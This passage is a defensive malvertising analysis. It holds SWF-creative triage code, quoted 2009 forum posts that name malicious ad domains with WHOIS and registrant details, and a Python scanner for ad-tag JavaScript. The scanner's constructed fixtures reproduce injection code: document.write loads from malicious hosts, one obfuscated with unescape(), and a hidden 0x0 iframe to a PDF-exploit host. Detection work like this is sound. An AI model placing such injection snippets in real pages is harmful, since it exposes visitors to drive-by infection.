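            "edit_text_fields": codes.count(37),
            "tags": [TAG_NAMES.get(c, "Unknown(%d)" % c) for c in codes]}


# ---- constructed samples (not real creatives) -----------------------------
def make_tag(code, payload=b""):
    if len(payload) < 0x3F:
        return struct.pack("<H", (code << 6) | len(payload)) + payload
    return struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload


def _rect(xmin, xmax, ymin, ymax, nbits=15):
    bits = nbits
    for v in (xmin, xmax, ymin, ymax):
        bits = (bits << nbits) | (v & ((1 << nbits) - 1))
    total, nbytes = 5 + 4 * nbits, (5 + 4 * nbits + 7) // 8
    return (bits << (nbytes * 8 - total)).to_bytes(nbytes, "big")


def build_swf(tags, compress=False, version=9, fps=12, frames=1):
    body = _rect(0, 300 * 20, 0, 250 * 20) + struct.pack("<HH", fps << 8, frames)
    body += b"".join(tags)
    hdr = (b"CWS" if compress else b"FWS") + bytes([version]) + struct.pack("<I", 8 + len(body))
    return hdr + (zlib.compress(body) if compress else body)


# One frame, attributes + background only: the "nothing in it" shell.
SAMPLE_EMPTY = build_swf([make_tag(69, b"\x00\x00\x00\x00"), make_tag(9, b"\xff\xff\xff"),
                          make_tag(1), make_tag(0)], compress=True)
# A text field plus AVM1 bytecode: the dynamic-text carrier shape (dummy payloads).
SAMPLE_DYNAMIC_TEXT = build_swf([make_tag(69, b"\x00\x00\x00\x00"),
                                 make_tag(37, b"\x01\x00" + b"\x00" * 40),
                                 make_tag(12, b"\x00"), make_tag(1), make_tag(0)])

if __name__ == "__main__":
    for name, blob in (("shell", SAMPLE_EMPTY), ("dynamic_text", SAMPLE_DYNAMIC_TEXT)):
        info = parse_swf(blob)
        print(name, info["stage_px"], info["frame_count"], triage(info))
```

An "empty" verdict on a creative is itself a finding: a shell that draws nothing exists only to be swapped for a different payload later, so the same URL is worth re-fetching over several days and from several source IPs. A DefineEditText tag next to DoAction or DoABC is the shape to decompile by hand; this walker only flags it, it does not decode the text or the bytecode.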


Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Tue Aug 11, 2009 12:45 am

Malvertizement featuring TravelRes
The malvertizement attempted to load a clickrevenue.info URL:

clickrevenue.info
ICANN Registrar: REGTIME LTD
Created 21 July 2009
NS1.NAMESELF.COM (89.108.122.149 - Agava) (195.161.113.218 - RTCOMM, Russia)
NS2.NAMESELF.COM (89.108.122.120.153 - Agava) (217.16.27.38 - MASTERHOST, Russia)

IP:  89.149.243.28 - Berlin, Netdirekt E.k

Registrant:
Paul McShane (paulmcshane@pisem.net)
St Mainlow 212
San Jose CA 96014
Tel: +1 212 265 4785 77

pisem.net (Registrant email address)
ICANN Registrar: NETWORK SOLUTIONS, LLC.
Created 19 November 1999
NS1.POCHTA.RU
NS2.POCHTA.RU
NS3.POCUTA.RU

IP: 82.204.219.251 - Moscow City, Pochta.ru Network
0-= Continued @ Spyware Sucks Blog


Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Fri Sep 04, 2009 10:13 am

ALERT: Please treat the domains gogomediacenter.com, sys17media.com and praharesorts.cn with extreme caution
It is very interesting to watch the modus operandi that the bad guys are using change.

This malvertizement was NOT seen on a web page; rather it was being displayed by an advertising supported freeware application.

The trouble starts when an ad.yieldmanager.com GET retrieves content, in an iframe, from the domain "gogomediacenter.com". The content served up by gogomediacenter.com is an innocent "skechers" JPG (which is the advertisement itself), but it also serves up a little something extra...
0-= Continued @ Spyware Sucks


Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Wed Sep 09, 2009 11:46 pm

Another two bad domains: newadsresults.com and waveadvert.com
Seen distributing malvertizing at starnewsonline.com:
http://forums.starnewsonline.com/eve/fo ... 9841029019

And collegehumor.com:
http://www.facebook.co.za/CollegeHumor

And tigerdroppings.com:
http://www.tigerdroppings.com/rant/mess ... 80012&pg=1

And basilmarket.com (page doesn't load, but you can find it in Google cache):
http://www.basilmarket.com/forum/1184277/2
0-= Continued @ Spyware Sucks Blog


Re: Rogue Banner Ads [Gilmours Media [May 21]

Postby TeMerc » Sun Sep 13, 2009 12:40 am

ALERT: Please treat content from trendbanner.com with extreme caution
It has been implicated in the facilitation of malvertizing that attempts to infect computers via PDF exploit

The way it works is as follows:

ad.trendbanner.com uses document.write to load the JS content at banner.pushbanner769.info

banner.pushbanner769.info displays an advertisement, but also loads content from t.banner08092.com.

t.banner08092.com simply redirects to blackwater-cuprumworks.net

blackwater-cuprumworks.net includes a JavaScript (valla.js) which loads content from bintus-bahi.cn in a 0x0 iframe

bintus-bahi.cn uses CVE-2009-0927 (Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object) to infect vulnerable computers, as well as downloading other malware.

The SWF (oneComesEthics.swf) is suspected to be malicious.
0-= Continued @ Spyware Sucks Blog
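The trendbanner.com chain above (document.write loading a third-party script, which writes another script, which ends in a 0x0 iframe to the exploit host) and the earlier gogomediacenter.com case (an ad-network iframe whose document serves a JPG plus "something extra") are the same inspection problem: what active content does each fetched response write into the page, and where does it point? The scanner below is an added example, not the blog author's tooling. The three JavaScript responses are constructed to mirror the hop order in the post; the hostnames are the ones named there, but the paths (show.js, b.js, t.js, in.php) and the advertiser URL are placeholders.

```python
"""Scan fetched ad-tag JavaScript for document.write-injected third-party
<script>/<iframe> loads, decoding unescape()-wrapped markup and flagging
0x0 or display:none frames.  The responses below are constructed samples."""
import re
from urllib.parse import unquote, urlparse

SAMPLES = {
    "http://ad.trendbanner.com/show.js": r'''
var d = document;
d.write(unescape("%3Cscript src=%22http://banner.pushbanner769.info/b.js%22%3E%3C/script%3E"));
''',
    "http://banner.pushbanner769.info/b.js": r'''
document.write('<a href="http://advertiser.example/"><img src="/creative.jpg"></a>');
document.write('<script src="http://t.banner08092.com/t.js"><\/script>');
''',
    "http://blackwater-cuprumworks.net/valla.js": r'''
document.write('<iframe src="http://bintus-bahi.cn/in.php" width="0" height="0" frameborder="0"></iframe>');
''',
}

STR_RE = re.compile(r"'((?:\\.|[^'\\])*)'|\"((?:\\.|[^\"\\])*)\"")
TAG_RE = re.compile(r"<(script|iframe|embed|object|img)\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"([a-zA-Z:-]+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")
ACTIVE = {"script", "iframe", "embed", "object"}   # ads legitimately write <img>


def extract_write_calls(js):
    """Argument text of every *.write(...) / *.writeln(...) call.  Matching on
    '.write(' instead of 'document.write(' catches the 'var d = document'
    alias; the paren/quote walk keeps a nested unescape(...) intact."""
    out = []
    for m in re.finditer(r"\.write(?:ln)?\s*\(", js):
        i = start = m.end()
        depth, quote = 1, None
        while i < len(js) and depth:
            ch = js[i]
            if quote:
                if ch == "\\":
                    i += 1                      # skip the escaped character
                elif ch == quote:
                    quote = None
            elif ch in "'\"":
                quote = ch
            elif ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            i += 1
        out.append(js[start:i - 1])
    return out


def decode_write_arg(arg):
    """Join the string literals of the argument; %XX-decode if wrapped in unescape()."""
    text = "".join(a or b for a, b in STR_RE.findall(arg)).replace("\\/", "/")
    return unquote(text) if re.search(r"\bunescape\s*\(", arg) else text


def parse_attrs(s):
    return {k.lower(): (dq or sq or bare) for k, dq, sq, bare in ATTR_RE.findall(s)}


def is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    zero = {"0", "0px"}
    return (attrs.get("width") in zero or attrs.get("height") in zero
            or "display:none" in style or "visibility:hidden" in style)


def analyze_hop(src_url, js):
    """Findings for one fetched response: active content it writes into the page."""
    src_host = urlparse(src_url).hostname
    findings = []
    for arg in extract_write_calls(js):
        for m in TAG_RE.finditer(decode_write_arg(arg)):
            tag, attrs = m.group(1).lower(), parse_attrs(m.group(2))
            target = attrs.get("src") or attrs.get("data")
            if tag not in ACTIVE or not target:
                continue
            host = urlparse(target).hostname
            findings.append({"from": src_host, "tag": tag, "target": target, "host": host,
                             "cross_origin": bool(host) and host != src_host,
                             "hidden": tag == "iframe" and is_hidden(attrs),
                             "obfuscated": bool(re.search(r"\bunescape\s*\(", arg))})
    return findings


def chain(samples):
    """Flatten findings over the fetched responses in the order they were served."""
    return [f for url, js in samples.items() for f in analyze_hop(url, js)]


if __name__ == "__main__":
    for f in chain(SAMPLES):
        flags = [k for k in ("cross_origin", "hidden", "obfuscated") if f[k]]
        print("%-28s -> %-7s %-28s %s" % (f["from"], f["tag"], f["host"], ",".join(flags)))
```

Two things this content scan cannot see, and that a capture of the chain must record separately: the t.banner08092.com hop is an HTTP redirect, visible only in the response status and Location header, and the final PDF is identified by its Content-Type or its %PDF magic bytes rather than by anything written into the page. A 0x0 cross-origin iframe reached through an unescape()-wrapped document.write is the signature to alert on; a visible same-origin frame from the ad server is normal.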